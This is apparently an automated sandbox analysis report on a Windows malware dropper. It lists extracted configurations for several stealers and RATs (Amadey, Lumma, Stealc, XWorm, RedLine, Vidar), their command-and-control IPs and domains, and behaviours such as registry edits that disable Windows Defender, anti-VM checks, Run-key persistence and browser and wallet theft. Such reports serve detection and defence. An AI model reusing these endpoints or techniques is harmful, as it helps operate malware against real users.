Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09/03/2025, 02:41
Static task
static1
Behavioral task
behavioral1
Sample
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Resource
win10v2004-20250217-en
General
-
Target
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
-
Size
1.9MB
-
MD5
5b1dbccb1977e33fae7e0efa78e96b49
-
SHA1
fd97d5e5080b0130e21f998ed33b47997dd87d84
-
SHA256
c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77
-
SHA512
62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8
-
SSDEEP
49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://defaulemot.run/api
https://begindecafer.world/api
https://.garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://j8arisechairedd.shop/api
https://garagedrootz.top/api
https://gmodelshiverd.icu/api
https://biochextryhub.bet/api
https://q8explorebieology.run/api
https://gadgethgfub.icu/api
https://moderzysics.top/api
https://5ktechmindzs.live/api
https://6codxefusion.top/api
https://7phygcsforum.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://garisechairedd.shop/api
https://0modelshiverd.icu/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
XClient.exe
-
pastebin_url
https://pastebin.com/raw/H3wFXmEi
Extracted
redline
Build 7
101.99.92.190:40919
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 6 IoCs
resource yara_rule behavioral1/memory/3428-2589-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3428-2588-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3428-2585-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3428-2583-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3428-2581-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/3428-2579-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000600000001ad93-1474.dat family_xworm behavioral1/memory/3488-1482-0x00000000009F0000-0x0000000000A24000-memory.dmp family_xworm behavioral1/memory/3688-1505-0x0000000001370000-0x00000000013A4000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/3260-1465-0x0000000000E80000-0x00000000012F2000-memory.dmp healer behavioral1/memory/3260-1466-0x0000000000E80000-0x00000000012F2000-memory.dmp healer behavioral1/memory/3260-1510-0x0000000000E80000-0x00000000012F2000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" eb8fc3faf3.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" eb8fc3faf3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" eb8fc3faf3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" eb8fc3faf3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" eb8fc3faf3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" eb8fc3faf3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection eb8fc3faf3.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" eb8fc3faf3.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications eb8fc3faf3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" eb8fc3faf3.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral1/memory/3624-2351-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/3624-2348-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/3624-2346-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/3624-2355-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/3624-2353-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 5 IoCs
resource yara_rule behavioral1/memory/3624-2351-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/3624-2348-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/3624-2346-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/3624-2355-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/3624-2353-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 3764 created 1208 3764 Occupation.com 21 PID 3764 created 1208 3764 Occupation.com 21 PID 3952 created 1208 3952 Seat.com 21 PID 3952 created 1208 3952 Seat.com 21 -
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ CgmaT61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6757fa68cc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 84a6344dd6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eb8fc3faf3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ yUI6F6C.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 7 1972 powershell.exe 8 1972 powershell.exe 10 1972 powershell.exe 11 1972 powershell.exe 141 3164 powershell.exe 142 3164 powershell.exe 143 3164 powershell.exe 144 3164 powershell.exe -
pid Process 3684 powershell.exe 2944 powershell.exe 1972 powershell.exe 4064 powershell.exe 3164 powershell.exe -
Downloads MZ/PE file 14 IoCs
flow pid Process 5 2200 rapes.exe 5 2200 rapes.exe 5 2200 rapes.exe 5 2200 rapes.exe 5 2200 rapes.exe 5 2200 rapes.exe 5 2200 rapes.exe 145 2200 rapes.exe 145 2200 rapes.exe 145 2200 rapes.exe 145 2200 rapes.exe 145 2200 rapes.exe 145 2200 rapes.exe 26 584 XxzH301.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000400000001cfe8-2561.dat net_reactor behavioral1/memory/3632-2569-0x0000000000070000-0x00000000000D0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6757fa68cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 84a6344dd6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eb8fc3faf3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6757fa68cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 84a6344dd6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eb8fc3faf3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe -
Executes dropped EXE 20 IoCs
pid Process 2200 rapes.exe 584 XxzH301.exe 1996 m4mrV1B.exe 2600 OSKDbmy.exe 1208 Explorer.EXE 2164 6757fa68cc.exe 1604 mic107A.tmp.exe 988 84a6344dd6.exe 3060 c4e478285d.exe 3260 eb8fc3faf3.exe 3488 HHPgDSI.exe 3688 HHPgDSI.exe 3824 m4mrV1B.exe 3452 ReK7Ewx.exe 3764 Occupation.com 3924 yUI6F6C.exe 1460 ADFoyxP.exe 3952 Seat.com 2300 CgmaT61.exe 3804 PfOHmro.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 84a6344dd6.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine eb8fc3faf3.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine yUI6F6C.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine CgmaT61.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 6757fa68cc.exe -
Loads dropped DLL 35 IoCs
pid Process 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 1208 Explorer.EXE 2200 rapes.exe 2200 rapes.exe 1608 WerFault.exe 1608 WerFault.exe 1608 WerFault.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 2200 rapes.exe 3576 cmd.exe 2200 rapes.exe 2200 rapes.exe 3828 WerFault.exe 3828 WerFault.exe 3828 WerFault.exe 2200 rapes.exe 3656 cmd.exe 2200 rapes.exe 2200 rapes.exe 3764 Occupation.com 3352 WerFault.exe 3352 WerFault.exe 3352 WerFault.exe 2200 rapes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features eb8fc3faf3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" eb8fc3faf3.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\6757fa68cc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148390101\\6757fa68cc.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\84a6344dd6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148400101\\84a6344dd6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\c4e478285d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148410101\\c4e478285d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\eb8fc3faf3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148420101\\eb8fc3faf3.exe" rapes.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 13 bitbucket.org 143 bitbucket.org 144 bitbucket.org 189 bitbucket.org 190 bitbucket.org 6 bitbucket.org 7 bitbucket.org 8 bitbucket.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 139 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a491-1300.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3660 tasklist.exe 3724 tasklist.exe 2272 tasklist.exe 3148 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2960 c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe 2200 rapes.exe 2164 6757fa68cc.exe 988 84a6344dd6.exe 3260 eb8fc3faf3.exe 3924 yUI6F6C.exe 2300 CgmaT61.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\PracticeRoot ReK7Ewx.exe File opened for modification C:\Windows\PerfectlyFda ADFoyxP.exe File opened for modification C:\Windows\PracticalPrevent ADFoyxP.exe File opened for modification C:\Windows\UpdatedMakeup ADFoyxP.exe File created C:\Windows\Tasks\rapes.job c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe File opened for modification C:\Windows\PlatesRegister ReK7Ewx.exe File opened for modification C:\Windows\AccreditationShed ADFoyxP.exe File opened for modification C:\Windows\GovernmentsHighly ADFoyxP.exe File opened for modification C:\Windows\HighKerry ADFoyxP.exe File opened for modification C:\Windows\FilenameWho ADFoyxP.exe File opened for modification C:\Windows\CombatTongue ReK7Ewx.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 1608 2164 WerFault.exe 45 3828 3924 WerFault.exe 103 3352 2300 WerFault.exe 126 3940 3804 WerFault.exe 129 3604 3872 WerFault.exe 133 3704 3540 WerFault.exe 140 2580 3376 WerFault.exe 141 3596 3632 WerFault.exe 147 2436 3360 WerFault.exe 153 -
System Location Discovery: System Language Discovery 1 TTPs 52 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Seat.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yUI6F6C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CgmaT61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 84a6344dd6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Occupation.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language c4e478285d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mic107A.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb8fc3faf3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ADFoyxP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PfOHmro.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage c4e478285d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6757fa68cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c4e478285d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReK7Ewx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1876 iexplore.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2496 taskkill.exe 1664 taskkill.exe 1364 taskkill.exe 2920 taskkill.exe 2288 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0D442A61-FC90-11EF-8C6C-D686196AC2C0} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30540be39c90db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000020db81b6104e0c4d9628dd63a5c6696d00000000020000000000106600000001000020000000e55e8dc8a6bcd56d04a201d6950dbbc930c461366fa06fab7e935fa48c476334000000000e80000000020000200000006e31d82100a4381431cfb2ea2ec04fc30799082a319c1ee2260621d9db44410f20000000861572cb5c41dc3f3de6b65c2f859eed6b2d402401bfbe5577a4d4aecd4a640b40000000a590d95f91b78d5b37425675bd8a32369bc0c3a8ecb5be0cddbb66bd6374262aa353f65f17465852bc15722628da6a64185d5a74f01760ac2992d7033b464d88 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000020db81b6104e0c4d9628dd63a5c6696d000000000200000000001066000000010000200000005b6fa9510bb1960cde2ffe44456b3edb1b1a7bce159dcd4b30338e3fea303275000000000e8000000002000020000000e1188e4818d51efbda7edd0036c4861a9387e728e5174976286d81cf55e2487f900000001f8724f4b9b61f75cec561376e6abdd9617f99740370f1b05c2ab45c08c2d161baceb5067e6b3302c1a52304808f1f4a629f490f82c1f0918bba1592e6e4f84ea42a77f0033782c25e76ba04ac347f2d653d9ed90bb534a44c6f64f77c6ecc55c912971ce03456230711d2766d0f0829388b375c61e7e0791fd0b283bf4a5c6f257ded43092cbe72dfd947e6cd3d1bfe400000003a3dcfe34bd8a858c2114d22830d07aa0da0b9e018d1e018046ed807b567e2f289a01815a8a54c2dfbcda59a7d1785da22c2503e15945a8db70df8d6fc954067 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup 